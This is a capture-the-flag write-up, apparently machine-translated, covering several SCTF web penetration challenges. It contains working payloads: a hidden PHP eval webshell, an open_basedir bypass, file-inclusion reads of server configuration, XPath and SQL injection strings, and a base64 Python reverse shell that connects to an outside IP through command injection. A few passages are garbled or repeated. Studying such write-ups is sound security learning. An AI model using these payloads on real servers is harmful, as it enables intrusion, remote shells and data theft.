The path of painful penetration
0x00 Preface
The CTF was very sour this time. There were 7 WEB penetration topics, which was also the beginning of pain. Good audit, why add so many high thresholds.
0x01 Pentest-homework-200
http://homework.sctf.xctf.org.cn/
Open the complete page, that is, log in to the registration page. Name, age, upload pictures.
After successful login, a picture is displayed. There is also a link to homework.
After clicking the home link, there is a web address of the wrapped page.
http://homework.sctf.xctf.org.cn/homework.php?homework=homework.txt
It can be determined that this is a brain hole with a file containing a vulnerability. Try uploading a Trojan horse image to include it now.
Inevitably, it includes failure.
Read the source code to see what's wrong with the upload function.
http://homework.sctf.xctf.org.cn/homework.php?homework=php://filter/convert.base64-encode/resource=index.php
Read successfully. Then download all the read source code.
Pass audit code
if(isset($_POST\['upload'\])){
$filename = $_FILES\['uploaded'\]\['name'\];
$filetype = $_FILES\['uploaded'\]\['type'\];
$filesize = $_FILES\['uploaded'\]\['size'\];
$tmpname = $\_FILES\['uploaded'\]\['tmp\_name'\];
$uploaddir = './upload/';
$target_path = $uploaddir.basename($filename);
$fileext = substr(strrchr($filename,"."),1);if(($fileext == 'gif')&&($filetype == "image/gif")){
{ if(move\_uploaded\_file($tmpname,$target_path))
{
}
}
$im =imagecreatefromgif($target_path);
srand(time());
$newfilename = strval(rand()).".gif";
$newimagepath = $uploaddir.$newfilename;
imagegif($im,$newimagepath);
unlink($target_path);
}else if(($fileext == 'jpg')&&($filetype == "image/jpeg")){
...
It's really interesting. The uploaded pictures have been processed by functions such as imagecreate fromgif.
But that's not the point. The point is the previous move_uploaded_file( t m p n a m e , tmpname, tmpname,target_path)
Those familiar with php code should know, but they have successfully uploaded pictures.
Network security CTF resource package
After successful upload, process and delete the source file unlink($target_path);.
Therefore, the topic is time competition, network speed and character.
Upload pictures of writing shell scripts
fputs(fopen(base64\_decode(dmlyLnBocA),w),base64\_decode(PD9waHAgQGV2YWwoJF9QT1NUWyd2aXJpbmsnXSk7Pz4tLS0t));
brup multithreaded access
http://homework.sctf.xctf.org.cn/homework.php?homework=upload/virink.jpg
If you have good character, you will succeed soon.
Later, I found that the written shell disappeared inexplicably. It was visually observed that someone stirred shit, and then I wrote / tmp.2333333
webshell was uploaded successfully, but it was found that many functions were castrated
disable\_functions= passthru,exec,phpinfo,system,chroot,scandir,chgrp,chown,shell\_exec,proc\_open,proc\_get\_status,popen,ini\_alter,ini\_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream\_socket\_server,pcntl\_exec
Then use PHP to bypass the open_basedir column directory and the black technology column directory.
virink=printf('<b>open\_basedir : %s </b><br />', ini\_get('open\_basedir'));$file\_list = array();$it = new DirectoryIterator("glob:home/wwwroot/default/web/*");foreach($it as $f) { $file\_list\[\] = $f->\_\_toString();}$it = new DirectoryIterator("glob:///.*");foreach($it as $f) { $file\_list\[\] = $f->\_\_toString();}sort($file\_list);foreach($file\_list as $f){echo "{$f}<br/>";}
Then read the flag
virink=echo file\_get\_contents('/home/wwwroot/default/web/4ff692fb12aa996e27f0a108bfc386c2');
SCTF{g00d_Good_Stu6y}
0x02 Pentest-sycshell-200
Right click to view the source code
<!-- Internal system data: http://sycshell.sycsec.com:61180/ -->
Change Hosts, and then use the domain name to access.
Then open the source code, decrypt the jsfuck code, and get
/W0Ca1N1CaiBuDa0/read.php?f=index
Code audit, including.
Source code:
<?php
show\_source(\_\_FILE__);
$pass = @$_GET\['pass'\];
$a = "syclover";
strlen($pass) > 15 ? die("Don't Hack me!") : ""; if(!is\_numeric($pass) || preg\_match('/0(x)?|-|\\+|\\s|^(\\.|\\d).*$/i',$pass)){ die('error');
} if($pass == 1 && $a\[$pass\] === "s"){
$file = isset($\_GET\['f'\]) ? $\_GET\['f'\].'.php' : 'index.php';
@include $file;
}?>
There's a brain hole!!!!! It's version limited.
According to the prompt: sycshell_tip audit, take a good look at the underlying code of PHP. In addition, it is convenient for you to 58.213.63.27:61180/phpinfo.php
First, you can get PHP version 5.3.29.
Version vulnerability,% 0b(\v) can bypass regular \ s
/?pass=%0b.1e1
php underlying source code
while (\*str == ' ' || \*str == '\\t' || \*str == '\\n' || \*str == '\\r' || \*str == '\\v' || \*str == '\\f') {
str++;
length--;
}
Another brain hole in this topic is phpinfo()+Lfi
Then there's the explosion, the, 2333
$pass bypasses this brain hole, which is similar to a problem of phithon cattle
https://www.leavesongs.com/PENETRATION/some-sangebaimao-ctf-writeups.html?lan=tw&lan=tw&lan=tw
Question 3: PHP type and logic + fuzz y and the _0x03 function feature of source code audit lead to bypassing the _part.
0x03 Pentest-DrugMarket1-300
Drug Market: http://www.spentest.com/
At the beginning, it was a brain hole, pseudo 404 Not Found page. I once suffered losses in this regard, and then silently looked at the source code and clicked on the hidden links.
http://drug.spentest.com/
Click order to submit data, and then there is no other function. xss may exist.
I continued to look at the source code and found a link.
http://msgboard.spentest.com/
Click order to submit data, and then there is no other function. xss may exist.
I continued to look at the source code and found a link.
http://msgboard.spentest.com/
Open the page and jump directly to
http://msgboard.spentest.com/index.php?action=login.php
Obviously, a file contains a vulnerability. After looking around, there is no place to upload.
Then study the page function. After the customer logs in and fills in the user name and contact information casually, it is found that there is a session, and the user name and contact information are not filtered.
The preliminary judgment is that it contains session. It habitually contains / TMP / sessions_xxxxxxxxx. It is found that it does not exist. It is absolutely forced to change the place.
Then, to find the storage address of the session, you must first read the apache configuration file.
http://msgboard.spentest.com/index.php?action=../../../../../../../../etc/httpd/conf/httpd.conf
obtain
<VirtualHost 0.0.0.0:80>
ServerAdmin Syclover
DocumentRoot /var/www/html
<Directory "/var/www/html">
AssignUserId apache apache
php\_value session.save\_path "/var/lib/php/session"</VirtualHost>
<VirtualHost 0.0.0.0:80>
ServerAdmin Syclover
ServerName www.spentest.com
DocumentRoot /var/www/webhosts/www
<Directory "/var/www/webhosts/www">
AssignUserId www www
php\_value session.save\_path "/var/lib/php/session_www"</VirtualHost>
<VirtualHost 0.0.0.0:80>
ServerAdmin Syclover
ServerName drug.spentest.com
DocumentRoot /var/www/webhosts/drug
<Directory "/var/www/webhosts/drug">
AssignUserId drug drug
php\_value session.save\_path "/var/lib/php/session_drug"</VirtualHost>
<VirtualHost 0.0.0.0:80>
ServerAdmin Syclover
ServerName msgboard.spentest.com
DocumentRoot /var/www/webhosts/msgboard
<Directory "/var/www/webhosts/msgboard">
AssignUserId msgboard msgboard
php\_value session.save\_path "/var/lib/php/session_msgboard"</VirtualHost>
Smoothly know that the storage address of the session is / var/lib/php/session_msgboard
Username or Contact write
http://msgboard.spentest.com/index.php?action=../../../../../../../../var/lib/php/session\_msgboard/sess\_rb2rbfrie8rku2n81dq52vghp0
Then there is further information gathering
virink=phpinfo()
obtain
disable\_functions=passthru,exec,system,chroot,scandir,chgrp,chown,shell\_exec,proc\_open,proc\_get\_status,popen,ini\_alter,ini\_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream\_socket_server
Other sites have no access rights. Silently read the source code of this site and get the database connection information.
Because this topic has been by FB, silently collect the information of predecessors. / tmp directory is my favorite... 23333
After reading a lot of useless things, I also got some useful things, such as the root password of mysql.23333
At that time, I had a brain attack and didn't save it well. After / tmp was inexplicably emptied, I couldn't find the relevant information of mysql database.
The thought is interrupted, and I always don't know how to execute the command.
Repeated research tips
This is a penetration problem, so please don't be limited to your current Shell and find a way to penetrate the drug site. In order to make the problem closer to the real environment, the firewall rules are more strict. Finally, I went back to XSS. Because I have seen the drug database and there is no administrator user table.
orderX comes and goes without effect. Then, when prompted by the little partner, X enters the adminconfig and successfully obtains the cookie!
After entering the administrator page, I found that there is a function of downloading pictures. My server listens to a port, and the server accesses my server, but there is no result. I still listen to port 80 when prompted by my partner. I found that prompt 2 is this brain hole.
Then you receive a wget request.
Visually, there is a command execution vulnerability.
Black Technology: $IFS instead of spaces
Upload a bounce py script
virink=fputs(fopen('/tmp/vvv.py',w),base64_decode(aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zDQpzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0Kcy5jb25uZWN0KCgiNDUuNzguMTMuMjMiLDgwKSkNCm9zLmR1cDIocy5maWxlbm8oKSwwKQ0Kb3MuZHVwMihzLmZpbGVubygpLDEpDQpvcy5kdXAyKHMuZmlsZW5vKCksMikNCnA9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9iYXNoIiwiLWkiXSk7DQo));
Then execute the command
http://vvv/flag.jpg;python$IFS/tmp/vvv.py
Successfully get a bash shell.
Finally, find flag1.txt in / home/drug
SCTF{b68181af58bdf261714942f0d1a823be}
0x04 Pentest-ETO-200
This is the first topic to be released, but it was tossed out at the end.
Simply try, there is injection.
Then, all kinds of injection failed.
The official tips are wonderful:
There's no need to try to blow up the ETO. In addition, hint is always there
I didn't find out where hint was from beginning to end.
It is found after the injection is completed that when an error is reported, a hint: / / user[id=1] is returned in the response header
The questioner's brain hole is absolutely forced to give 101 points, out of 100. More than one point is deep fatherly love.
At the prompt of my partner, I knew that this was an xpath injection.
Quotes are filtered, but the official tip 2 says make good use of existing characters.
Note: the characters in the password exist in username, email and role. It's ok to use the substring() function to judge character by character
http://eto.sctf.xctf.org.cn/?action=user&id=1 and substring(//user\[1\]/username,1,1)=substring(//user\[1\]/password,1,1)
Blow up another wave with your artifact Burp.
Finally, run out the 32-bit password: Ywj@4791.d_gToWDmceu.Eali0s2yarn
You can get the Flag after logging in
SCTF{0f61ce4eb984a4a6d3aaa31f779533df}
0x05 pentest hackme 300 unsuccessful
http://hackme.sctf.xctf.org.cn
Tuotuo can't do it, or injection. Injection has always been my weakness. Orz
According to official tips
1. Website developers often read memos. 2. Try to get the administrator password. 3. Pay attention to the database connection mode. 4.XSS
And tips for small partners: PDO injection.
Baidu gets: PDO database connection, which can be injected by insert.
Toss around and make a look.
http://hackme.sctf.xctf.org.cn/index.php?id=0;/*!50000insert*//*!50000into*/beiwanglu(id,time,event)/*!50000values*/(9,'virink',/*!50000select*/(/*!50000hex*/(/*!50000load_file*/(0x2F6574632F706173737764))));%23
Successfully X to the administrator's COOKIE...
Then try to get the administrator password according to the prompt. You can probably know that the next step may be to hijack the form and get the administrator password.
However, I won't.
XSS is more difficult than SQL injection ~~Orz
0x06 write last
Finally, the CTF was ended with 910 points of 0x01-0x04 + 10 points.
The brain hole is still not big enough and has too little experience. And stupid. Many key places and non key places have fallen into thinking misunderstandings. Without the tips of small partners, I guess I can get a sign in score of 10 points.